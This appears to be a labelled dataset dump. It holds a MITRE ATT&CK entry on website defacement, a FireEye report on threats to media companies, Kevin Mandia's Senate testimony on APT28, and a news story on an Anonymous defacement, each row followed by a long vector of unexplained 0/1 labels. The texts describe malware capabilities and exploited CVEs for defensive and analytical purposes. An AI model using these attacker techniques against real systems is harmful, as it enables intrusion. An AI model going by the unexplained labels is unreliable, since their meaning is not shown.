Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Defacement Defacement Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Internal An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.[1] Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.[2] External Websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.[3][4][5] Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.[6] ID:\xc2 T1491 Tactic: Impact Platform:\xc2 Linux, macOS, Windows Data Sources:\xc2 Packet capture, Web application firewall logs, Web logs, Packet capture Impact Type:\xc2 Integrity Version:\xc2 1.0 Mitigations Mitigation Description Data Backup Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery. Detection Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation. References Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. FireEye. (n.d.). Retrieved April 19, 2019. Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019. Andy. (2018, May 12). \xe2\x80\x98Anonymous\xe2\x80\x99 Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019. Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"INDUSTRY INTELLIGENCE REPORT WE HAVE OBSERVED AT LEAST 17 ADVANCED THREAT GROUPS COMPROMISE COMPANIES IN THESE SUBSECTORS: \xe2\x80\xa2 Entertainment & Games Software \xe2\x80\xa2 Diversified Entertainment \xe2\x80\xa2 Information Collection & Delivery \xe2\x80\xa2 Internet Publishing, Broadcasting & Search Portals \xe2\x80\xa2 Magazine Publishers \xe2\x80\xa2 Multimedia, Graphics & Publishing Software \xe2\x80\xa2 Newspaper Publishers \xe2\x80\xa2 Television Station Groups CYBER THREATS TO THE ENTERTAINMENT AND MEDIA INDUSTRIES ENTERTAINMENT AND MEDIA COMPANIES FACE CYBER THREATS FROM THE FOLLOWING ACTORS: \xe2\x80\xa2 Advanced Persistent Threat (APT)1 groups assisting their sponsoring government in controlling its national image by stealing information related to media organizations\xe2\x80\x99 reporting activities, including personnel, sources, local partnerships, anticipated public releases, general country operations, and specific areas of research. \xe2\x80\xa2 APT groups engaging in economic espionage to provide their indigenous entertainment and media companies with a competitive advantage through stealing data related to other companies\xe2\x80\x99 mergers, acquisitions, or distribution; technologies or processes for advanced production; and creative intellectual property. \xe2\x80\xa2 Hacktivists and APT groups seeking to disrupt a victim company\xe2\x80\x99s operations to promote a cause, control reporting, or contain the dissemination of content that they consider politically sensitive or controversial. APT groups may potentially try to mask the identity of their government sponsor by posing as an independent hacktivist group when targeting a victim company. \xe2\x80\xa2 Enterprise-like cybercriminals seeking personal profit through targeting the gaming industry and stealing account credentials, activation codes, in-game valuables, and personally identifiable information (PII). CASE STUDY: APT28 SUSPECTED IN FALSE FLAG OPERATION ON FRENCH MEDIA COMPANY In April 2015, threat actors compromised TV5 Monde, a French news station with a global audience. The actors damaged equipment, disrupting broadcasts for several hours, and defaced the company\xe2\x80\x99s website and social media accounts with propaganda pertaining to ISIS and the CyberCaliphate, a hacktivist group allegedly associated with ISIS. However, although the activity initially appeared to be the work of the CyberCaliphate, 1 Advanced Persistent Threat (APT) actors are assessed to take direction from a nation state to steal information or conduct network attacks, tenaciously pursue their objectives, and are capable of using a range of tools and tactics. FireEye Threat Intelligence suspects that APT28, a group associated with the Russian government, was instead responsible for the activity. APT28 likely posed as the CyberCaliphate to capitalize on Western fears over Islamic extremism, particularly following the Charlie Hebdo-inspired attacks of several months prior. The compromise of TV5 Monde was likely a Russian information operation intended to alarm the French, with whom Russia\xe2\x80\x99s relations have been declining (as with the rest of the West), and draw the West\xe2\x80\x99s attention away from Russia\xe2\x80\x99s ongoing role in the Ukraine crisis and towards the threat of terrorism in the Middle East. THREAT HORIZON & INDUSTRY OUTLOOK The entertainment and media industries play a key role in shaping public opinion and even national image, making it a valuable target for APT groups and hacktivists seeking influence. The following factors may further influence threat activity towards these sectors: \xe2\x80\xa2 Concerns over domestic stability and government legitimacy will likely result in increased targeting from APT groups seeking to assist their associated government in monitoring public opinion, shaping its image, promoting its message, and otherwise leveraging its soft power to maintain and spread its influence. \xe2\x80\xa2 A desire to discourage publication of controversial stories and views may prompt some threat actors to attempt to gain access to a relevant media organization\xe2\x80\x99s raw reporting and acquire information on the identities of its sources. State- sponsored threat actors aiming to suppress a certain story, for example, may target a media organization reporting on the topic in an effort to evaluate what the organization knows about the issue, and identify its sources. \xe2\x80\xa2 Efforts to intimidate or punish a media organization for publishing a critical or unflattering story might prompt the threat actors to retaliate by targeting the offending media organization. Threat actors may steal data on employees and sources MALWARE FAMILIES TOP 5 59% ChinaChopper 15% SOGU (aka Kaba) 10% Gh0stRAT 8% PoisonIvy 8% Page CRIMEWARE FAMILIES TOP 5 35% Upatre 32% Delf 15% ZeroAccess (aka SIREFEF) 10% Allaple 8% Muxif DATA STOLEN FROM ENTERTAINMENT & MEDIA COMPANIES \xe2\x80\xa2 Address Books \xe2\x80\xa2 Calendar Files \xe2\x80\xa2 Executive Communications \xe2\x80\xa2 Negotiations Information \xe2\x80\xa2 Network Infrastructure Documents \xe2\x80\xa2 PR and Marketing Materials \xe2\x80\xa2 Reporters\xe2\x80\x99 Communications \xe2\x80\xa2 User Credentials INDUSTRY INTELLIGENCE REPORT / CYBER THREATS TO THE ENTERTAINMENT AND MEDIA INDUSTRIES \xc2\xa9 2016 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc. All other brands, products, or service names are or may be trademarks or service marks of their respective owners. IB.ENT.EN-US.052016 FireEye, Inc. 1440 McCarthy Blvd. Milpitas, CA 95035 / 408.321.6300 / 877.FIREEYE (347.3393) / info@FireEye.com www.FireEye.com TOP MALWARE FAMILIES FireEye most frequently detected threat actors using the following targeted malware families to compromise organizations in the entertainment and media sectors: ChinaChopper is a small webshell that provides threat actors unauthorized access to an information system using a simple password for authentication and is capable of executing Microsoft .NET code within HTTP POST commands. SOGU (aka Kaba, PlugX), a backdoor that is capable of file upload and download, arbitrary process execution, filesystem and registry access, service configuration access, remote shell access, and implementing a custom VNC/RDP-like protocol to provide the command and control (C2) server with graphical access to the desktop. GH0STRAT is a remote access tool (RAT) derived from publicly available source code. It can perform screen and audio captures, enable a webcam, list and kill processes, open a command shell, wipe event logs, and create, manipulate, delete, launch, and transfer files. POISONIVY is a publicly available RAT that provides comprehensive remote access capabilities on a compromised system. Its variants are configured, built, and controlled using a graphical Poison Ivy management interface available online. It can be configured to produce shellcode, which can be packaged into an executable or combined with an existing executable to hide its presence. It is typically configured to inject multiple shellcode stubs into the explorer.exe process. Page (aka ELISE) is a downloader that attempts to retrieve encoded DLLs from a pre-configured command and control server, which it communicates with using HTTP requests. Once the DLLs are downloaded, the downloader loads them into memory. It also incorporates several source-level anti-reverse engineering functions. TOP CRIMEWARE FAMILIES FireEye\xe2\x80\x99s sinkhole and dynamically shared threat data indicate that the following crimeware variants were the most commonly detected in the entertainment and media sectors: Upatre is a Trojan downloader that often arrives via a spam email, drive-by download or exploit,. Upatre will download one or more additional types of malware onto an infected system and has been observed distributing a wide variety of malware including, but not limited to, Zbot, Dyre, Rovnix, CryptoLocker, and Necurs. Delf is a family of Trojans whose files are often compiled in Delphi. It has the ability to connect to remote server for downloading and installing additional malware onto the system without the consent or knowledge of the user and may also have the ability to steal sensitive information. ZeroAccess (aka SIREFEF) is a Trojan with advanced rootkit capabilities. Initially developed as a delivery mechanism for other types of malicious software, it has been re-architected to perform click fraud. Allaple is a worm that will perform denial of service attacks on specific targets and attempt to propagate to other systems on the same network. Muxif is a Trojan downloader that communicates with a C2 server to send system information, receive instructions, and download additional malicious executables. It also modifies the registry to maintain persistence. in an effort to intimidate or monitor them. There is also the possibility that threat actors may try to steal and then publicly release sensitive data, in an attempt to embarrass the targeted organization and damage its credibility. \xe2\x80\xa2 Tensions or conflicts between adversaries, whether state or non-state, will probably lead to increased threat activity from associated threat actors aiming to prevent their adversary from spreading its own message or propaganda, while potentially seeking to spread its own propaganda through its opponents\xe2\x80\x99 channels. \xe2\x80\xa2 Increased popularity and use of social media will likely lead to continued targeting of providers and platforms by APT groups, cybercriminals, and hacktivists aiming to facilitate further targeting through social engineering, and/or promote their own views through disrupting services or defacing webpages.","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence March 30, 2017 Thank you, Mr. Chairman, Vice-Chairman Warner, and Members of the Senate Intelligence Committee, for the opportunity you have given me today to share our observations and our experiences regarding this important topic, as well as for your leadership on cybersecurity issues. As requested, I am going to discuss three topics here today: 1) the role of overt and covert cyber operations in support of Russian active measures, disinformation, and influence campaigns; 2) the cyber capabilities and techniques attributed to Russian state and non-state actors; and 3) recommendations to prevent and mitigate the threat posed by such cyber operations. 1. Background. Before I turn to your specific questions, let me share some background on myself and my company to inform the context of my narrative. I have been working in cybersecurity for over two decades, since I was first stationed at the Pentagon at the outset of my career as a Computer Security Officer in 1993. During my time investigating computer intrusions while I was in the Air Force, I came to recognize that the biggest cyber threats to our infrastructure were intrusions from other countries, most notably Russia and China. I founded Mandiant in 2004 to create a company with that could effectively respond to these threats and innovate technologies to help detect and respond to advanced attacks. Fast forward a few years, Mandiant was bought by FireEye, and I became FireEye\xe2\x80\x99s CEO last June in 2016. As I testify today, FireEye employees are on the front lines of the cyber battle, responding to active computer intrusions at dozens of the largest companies and organizations on a global scale, including incidents in cyber \xe2\x80\x9chot zones\xe2\x80\x9d such as the Middle East and Southeast Asia. Over the last 13 years, we have responded to incidents at hundreds of companies around the world. During that time, we have investigated millions of systems, and we receive calls almost every single day from organizations that have suffered a cybersecurity breach. In addition to the 300-plus security professionals responding to computer intrusions, FireEye has over 150 cyber-threat analysts on staff in 19 countries and speaking 32 different languages, to help us predict threats and better understand the adversary \xe2\x80\x93 often by considering the political and cultural environment of the threat actors. We have an enormous catalog of threat intelligence, and it continues to grow everyday coincident with the continually increasing attacks on organizations around the world. The information I will share today, then, is derived from our experiences responding to computer security breaches, as well as intelligence derived from our experienced team of cyber threat analysts and collected from more than 5000 customers who use our products to detect intrusions into their networks and respond to these attacks. 2. The Role of Overt and Covert Cyber Operations in Support of Russian Active Measures, Disinformation, and Influence Campaigns. The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the report, \xe2\x80\x9cAPT1: Exposing One of China\xe2\x80\x99s Cyber Espionage Units,\xe2\x80\x9d which detailed a professional cyber espionage group based in China. 1 Several months later in 2014 we released another report, this time regarding Russian cyber activities, entitled, \xe2\x80\x9cAPT28: A Window into Russia\xe2\x80\x99s Cyber Espionage Operations?\xe2\x80\x9d2 In that report, FireEye identified APT28 as a suspected Russian government-sponsored espionage actor, basing our conclusion on forensic details left in the malware employed since at least 2007. Since release of the initial report on APT28, we have continued to gather intelligence and collect data on the group\xe2\x80\x99s activities, and most recently, in January of this year, released \xe2\x80\x9cAPT28: At the Center of the Storm\xe2\x80\x9d3 which provides additional detail on the continued evolution of Russian cyber operations. As shown in our most recent report, an analysis of the activities of APT28 indicates the group\xe2\x80\x99s interest in foreign governments and militaries, particularly those of Europe, as well as regional security organizations. In addition, our research indicates that APT28 network activity has likely supported information operations designed to influence the domestic politics of foreign nations. We provide an extensive listing of targets including the World Anti-Doping Agency (WADA), the U.S. Democratic National Committee, Mr. John Podesta, the U.S. Democratic Congressional Campaign Committee (DCCC), as well as TV5Monde and the Ukrainian Central Election Commission (CEC). All of these breaches involved the theft of internal data \xe2\x80\x93 mostly emails \xe2\x80\x93 that was later strategically leaked through multiple forums and propagated in a manner almost certainly intended to advance particular Russian Government goals. We noted that the combination of network compromises and subsequent data leaks align closely with the Russian military\xe2\x80\x99s publicly stated intentions and capabilities. Russian strategic doctrine has for a long time included what the West terms \xe2\x80\x98information 1 https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf. 2 https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt- apt28.pdf. 3 https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf. operations\xe2\x80\x99 which have been further developed, deployed and modernized. The recent activity in the United States is one of many instances of such operations conducted in support of Russian political objectives. I note that our conclusions were consistent with the U.S. Office of the Director of National Intelligence report released on January 7, 2017 in which this activity is described as \xe2\x80\x9can influence campaign.\xe2\x80\x9d4 3. Cyber Capabilities and Techniques Attributed to Russian State and Non- State Actors So how was this done, and why do we assess that the Russian government was likely behind this activity? Let me first speak to the methodologies used. During the course of our APT28 investigations, we analyzed over 550 customer malware variants, identified approximately 500 domains, over 70 lure documents and dozens of spear phishing emails to help us understand their tools, techniques, and procedures. We find that APT28 continues to evolve its toolkit and refine its tactics in an effort to maintain its operational effectiveness in the face of heightened public exposure and scrutiny. In addition to the continued evolution of the group's first- stage tools, we have also noted that APT28 is: 1 - Leveraging at least five zero-day vulnerabilities in Adobe Flash Player, Java, and Windows in 2015 alone, including CVE-2015-1701, CVE-2015-2424, CVE-2015-2590, CVE-2015-3043, CVE-2016-7193, and CVE-2015-7645. 2 \xe2\x80\x93 Increasing its reliance on public code depositories, such as Carberp, PowerShell Empire, P.A.S. webshell, Metasploit modules, and others in a likely effort to accelerate their development cycle and provide plausible deniability. 3 - Obtaining credentials through fabricated Google App authorization and Oauth access requests that allow the group to bypass two-factor authentication (2FA) and other security measures, and 4 - Moving laterally through a network relying only on legitimate tools that already exist within victims' systems, at times forgoing their traditional toolset for the duration of the compromise. Over the past two years we have witnessed an escalation of APT 28\xe2\x80\x99s overall activities and one notable change in its rules of engagement. Specifically, since 2014 we have seen APT28 in many instances compromise a victim organization, steal information, and subsequently leak the stolen data into the public. Many of these leaks have been conducted through the use of \xe2\x80\x9cfalse hacktivist personas\xe2\x80\x9d, including, among others, \xe2\x80\x9cCyberCaliphate\xe2\x80\x9d, \xe2\x80\x9cGuccifer 2.0\xe2\x80\x9d, \xe2\x80\x9cDC Leaks\xe2\x80\x9d, \xe2\x80\x9cAnonymous Poland\xe2\x80\x9d, and \xe2\x80\x9cFancy Bears\xe2\x80\x99 Hack Team\xe2\x80\x9d. These \xe2\x80\x9cpersonas\xe2\x80\x9d appropriated pre-existing hacktivist or political brands likely to obfuscate their true identify, provide plausible deniability, and to create the perception of credibility. 4 https://www.intelligence.senate.gov/sites/default/files/documents/ICA 2017 01.pdf. Although we can link the collection activity to APT28, we have not been able to establish whether the APT28 operators themselves directly control the false personas that then leak material or if that responsibility instead resides with a separate entity. However, we do see similar patterns in infrastructure procurement between APT28 and some personas to suggest they played at least some role. For example, we believe that the actors behind the DCLeaks persona attempted to register the domain \xe2\x80\x9celectionleaks.com\xe2\x80\x9d one-week prior to \xe2\x80\x9cDCLeaks.com\xe2\x80\x9d in April 2016 \xe2\x80\x93 approximately two months prior to the first election-related leaks. These domains were registered using the service provider we have seen APT28 frequently use in the past to support cyber attacks. Thus, our intelligence indicates that APT28 likely operated with the knowledge that the data they stole during cyber intrusions would leverage these domains for public exposure of the data. I include the following timeline and analysis to illustrate the use of these techniques over the last few years. In June of 2014, Ukrainian officials revealed the investigation into the compromise of the Ukrainian Central Election Commission (CEC) internal network identified custom malware traced to APT28. During the May 2014 Ukrainian presidential election, purported pro-Russian hacktivists \xe2\x80\x9cCyberBerkut\xe2\x80\x9d conducted a series of malicious activities against the CEC, including a system compromise, data destruction, a data leak, a distributed denial-of- service (DDoS) attack, and an attempted defacement of the CEC website with fake election results. In February of 2015, FireEye identified APT28 (CORESHELL) traffic beaconing from TV5Monde's network, revealing APT28 had compromised TV5Monde's network. In April 2015, alleged pro-ISIS hacktivist group CyberCaliphate defaced TV5Monde's websites and social media profiles and forced the company's 11 broadcast channels offline. We identified overlaps between the domain registration details of CyberCaliphate's website and APT28 infrastructure. In July of 2016, the U.S. Democratic Congressional Campaign Committee (DCCC) announced that it was investigating an ongoing ""cybersecurity incident"" that the FBI believed was linked to the compromise of the DNC. House Speaker Nancy Pelosi later confirmed that the DCCC had suffered a network compromise. Investigators indicated that the actors may have gained access to DCCC systems as early as March. In August, the Guccifer 2.0 persona contacted reporters covering the U.S. House of Representative races to announce newly leaked documents from the DCCC pertaining to Democratic candidates. From August to October, Guccifer 2.0 posted several additional installments of what appear to be internal DCCC documents on its WordPress site. Between March and October of 2016, investigators found that John Podesta, Hillary Clinton's presidential campaign chairman, was one of thousands of individuals targeted in a mass phishing scheme using shortened URLs that security researchers attributed to APT28. Throughout October and into early November, WikiLeaks published 34 batches of email correspondence stolen from Mr. Podesta's personal email account. Correspondence of other individuals targeted in the same phishing campaign, including former Secretary of State Colin Powell and Clinton campaign staffer William Rinehart, were published on the ""DC Leaks"" website. In April through September, 2016, the U.S. Democratic National Committee (DNC) suffered a network compromise and a subsequent investigation found evidence of two breaches, attributed to APT28 and APT29. FireEye analyzed the malware found on DNC networks and determined that it was consistent with our previous observations of APT28 tools. In June 2016, shortly after the DNC's public announcement about the breach, the Guccifer 2.0 persona claimed responsibility for the DNC breach and leaked documents taken from the organization's network. Guccifer 2.0 continued to leak DNC documents through September of 2016. And finally, in September of 2016, WADA confirmed that APT28 had compromised its networks and accessed athlete medical data. On Sept. 12, 2016, the ""Fancy 'Bears' Hack Team"" persona claimed to have compromised WADA and released athletes' medical records as ""proof of American athletes taking doping."" Let me now turn to explaining why we assess that the Russian government was likely behind this activity. In order to make such an assessment, we reviewed and compared intrusion methodologies and tools, malware or authored exploits and use of shared personnel. We also examined forensic details that were left behind, such as the specific IP addresses or email addresses from spear phishing attacks, file names, MD5 hashes, timestamps, custom functions, encryption algorithms, or backdoors that may have command and control IP addresses or domain names embedded. Targeting was also critical to our assessment. Knowing the types of organizations, individuals, or data that a threat group targets provided us with insight into the group's motivations and objectives. Gathering this type of data about a group typically requires visibility into the group's operational planning, their initial attacks or infection attempts, or into actual victim environments. We track all of the indicators and significant linkages associated with identified threat groups in a proprietary database that we have developed over many years comprised of millions of nodes and linkages between groups, and then analyze this information carefully in the context of the relevant political and cultural environment to develop our assessments. Based on our extensive collected intelligence and analysis in this instance, we have determined that APT28\xe2\x80\x99s cyber operations are consistent with government sponsorship and control. Specifically, APT28 has relied upon a steady supply of sophisticated tools that would only have been available to a nation-state or state- protected contractor, pursued targets where Russian interests would be high, maintained a level of activity over several years requiring significant financial and personnel resources with no clear profit motive, and closely integrated its cyber attacks into broader propaganda efforts of benefit to a nation-state actor. There are alternative explanations for APT28\xe2\x80\x99s sponsorship, however in our view these only appear plausible for explaining one incident at a time, and are not credible in the context of the totality of APT28\xe2\x80\x99s operations. By combining an increasingly wide range of technical intelligence, hands-on remediation of compromised systems, and an understanding of Russia\xe2\x80\x99s geopolitical aims based on its own public statements, our confidence in assessing Russian government sponsorship or control of APT28 has only grown since release of our initial report in 2014. Moreover, the activities of APT28 are not consistent with any basic criminal activities to which we have responded, nor are they consistent with those perpetrated by a lone actor. The size of the infrastructure, the targeted information, the amount of malware and the totality of the sophistication, suggests a long-term, well-resourced espionage campaign in which Russia is the benefactor. In summary, while we do not have pictures of a building, names of individuals, or a government agency to name, our assessment is supported by evidence of long- standing, focused operations that indicates a Russian government sponsor and government capability. 4. Recommendations to Prevent and Mitigate the Threat Posed by Such Cyber Operations. Today, and into the foreseeable future, it is our view that the United States will face a motivated, technically sophisticated, and well-resourced adversary intent on accessing our private data, and potentially leaking it publicly. While many organizations are actively trying to counter these attacks, there currently exists a sizeable gap between what their safeguards can prevent and the ability of motivated attackers to circumvent those safeguards. Therefore, we will need to explore ways, both within and outside the cyber domain, to help deter these attacks. Of course, all enterprises \xe2\x80\x93 private sector or government \xe2\x80\x93 should work to accurately assess their own risk profiles, and utilize updated technology and best practices to protect their networks and systems. However, organizations cannot buy, hire or train their way to perfect security and we must consider effective deterrence and proportional response outside of the cyber domain as well. While diplomacy is not often cited as a primary tool in this arena, evidence collected regarding Chinese activity appears to reinforce its potential effectiveness. We conducted a comprehensive study of 182 compromised U.S. targets by 72 Chinese cyber threat groups going back to 2013, and we saw a sharp decline in these operations after September 2015 \xe2\x80\x93 when President Obama and President Xi met and specifically agreed to curtail cyber operations for commercial benefit. To be sure, Chinese cyber operations for traditional espionage remain, and US companies are still targeted for the security, political, economic, and military intelligence that Beijing seeks. However, it appears that the agreement had an impact, demonstrating that diplomacy can also be a useful tool for reducing the cyber threat both countries face, coupled with the public-private sector collaboration. This experience leaves me optimistic that with the combined efforts of both governments and the private sector, diplomatic engagement with Russia and other nations to restrict harmful cyber activity would be enforceable. In addition to Russia, North Korea and Iran have been tied to a series of escalating attacks that go back several years. We have been surprised by the audacity of the sponsoring nation and their willingness to surpass \xe2\x80\x9credlines\xe2\x80\x9d that we previously believed were established. It is entirely reasonable to suspect that these nations are emboldened by each other\xe2\x80\x99s behavior, and it is important to note that any response to the Russian cyber activities discussed today will likely be assessed by other countries. Again, we applaud the leadership shown by this Committee to bring important issues such as those discussed today to light, and we in the private sector look forward to continuing to work with you to disseminate and support industry best practices and encourage adoption of comprehensive and effective cybersecurity programs across government and industry. I look forward to answering your questions today. * * *","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"'Anonymous' Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW) - TorrentFreak About Contact Archives Tip Us Off Subscribe Tip Us Off Subscribe f t About Contact Archives 11919 Breaking News Stories 179k+ Social Media Followers 20.1k+ RSS Subscribers Breaking EasyDNS Threatened With Criminal Complaint over \xe2\x80\x98Pirating\xe2\x80\x99 Customer On: 17/09/2019 Comments: 0 \xe2\x80\x98Anonymous\xe2\x80\x99 Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW) By Andy on May 12, 2018 C: 0 News In retaliation for mass blocking that targeted Telegram but caused widespread collateral damage, hackers have hit the website of Russia's Federal Agency for International Cooperation. The attackers, who signed off as 'Anonymous' , left a not-safe-for-work rant criticizing local telecoms watchdog Roscomnadzor. Meanwhile, Telegram filed an appeal challanging a Supreme Court ruling concerning the surrender of encryption keys. Last month, Russian authorities demonstrated that when an entity breaks local Internet rules, no stone will be left unturned to make them pay, whatever the cost. The disaster waiting to happen began when encrypted messaging service Telegram refused to hand over its encryption keys to the state. In response, the Federal Security Service filed a lawsuit, which it won, compelling it Telegram do so. With no response, Roscomnadzor obtained a court order to have Telegram blocked. In a massive response, Russian ISPs \xe2\x80\x93 at Roscomnadzor\xe2\x80\x99s behest \xe2\x80\x93 began mass-blocking IP addresses on a massive scale. Millions of IP addresses belong to Amazon, Google and other innocent parties were rendered inaccessible in Russia, causing chaos online. Even VPN providers were targeted for facilitating access to Telegram but while the service strained under the pressure, it never went down and continues to function today. In the wake of the operation there has been some attempt at a cleanup job, with Roscomnadzor announcing this week that it had unblocked millions of IP addresses belonging to Google. \xe2\x80\x9cAs part of a package of the measures to enforce the court\xe2\x80\x99s decision on Telegram, Roskomnadzor has removed six Google subnets (more than 3.7 million IP-addresses) from the blocklist,\xe2\x80\x9d the telecoms watchdog said in a statement. \xe2\x80\x9cIn this case, the IP addresses of Telegram, which are part of these subnets, are fully installed and blocked. Subnets are unblocked in order to ensure the correct operation of third-party Internet resources.\xe2\x80\x9d But while Roscomnadzor attempts to calm the seas, those angered by Russia\xe2\x80\x99s carpet-bombing of the Internet were determined to make their voices heard. Hackers attacked the website of the Federal Agency for International Cooperation this week, defacing it with scathing criticism combined with NSFW suggestions and imagery. \xe2\x80\x9cGreetings, Roskomnadzor,\xe2\x80\x9d the message began. \xe2\x80\x9cYour recent destructive actions towards the Russian internet sector have led us to believe that you are nothing but a bunch of incompetent mindless worms. You shall not be able to continue this pointless vandalism any further.\xe2\x80\x9d Signing off with advice to consider the defacement as a \xe2\x80\x9cfinal warning\xe2\x80\x9d, the hackers disappeared into the night after leaving a simple signature. \xe2\x80\x9cYours, Anonymous,\xe2\x80\x9d they wrote. But the hackers weren\xe2\x80\x99t done yet. In a NSFW cartoon strip that probably explains itself, \xe2\x80\x98Anonymous\xe2\x80\x99 suggested that Roscomnadzor should perhaps consider blocking itself, with the implement depicted in the final frame. \xe2\x80\x9cAnus, block yourself Roscomnadzor\xe2\x80\x9d But while Russia\xe2\x80\x99s attack on Telegram raises eyebrows worldwide, the actions of those in authority continue to baffle. Last week, Prime Minister Dmitry Medvedev\xe2\x80\x99s press secretary, Natalia Timakova, publicly advised a colleague to circumvent the Telegram blockade using a VPN, effectively undermining the massive efforts of the authorities. This week the head of Roscomnadzor only added to the confusion. Effectively quashing rumors that he\xe2\x80\x99d resigned due to the Telegram fiasco, Alexander Zharov had a conversation with the editor-in-chief of radio station \xe2\x80\x98Says Moscow\xe2\x80\x99. During the liason, which took place during the Victory Parade in Red Square, Zharov was asked how he could be contacted. When Telegram was presented as a potential method, Zharov confirmed that he could be reached via the platform. Finally, in a move that\xe2\x80\x99s hoped could bring an end to the attack on the platform and others like it, Telegram filed an appeal this week challenging a decision by the Supreme Court of Russia which allows the Federal Security Service to demand access to encryption keys. Tagged in: Roscomnadzor, Telegram Newer Post Older Post You may also like: UFC Knocks Out First Pirate Site Following Debut Blocking Action Putin Asked to Investigate Damage Caused By Telegram Web-Blocking Russia Blocks 50 VPNs & Anonymizers in Telegram Crackdown, Viber Next c There are 0 comments. Add yours? comment policy Sponsors Popular Posts Which VPN Services Keep You Anonymous in 2019? Top 10 Most Popular Torrent Sites of 2019 What Are The Best Anonymous VPN Services? 5 Ways To Download Torrents Anonymously Most Commented Posts Swiss Copyright Law: Downloading Stays Legal, No Site Blocking 0 Eight Men Behind Two Pirate Streaming Services Charged by Grand 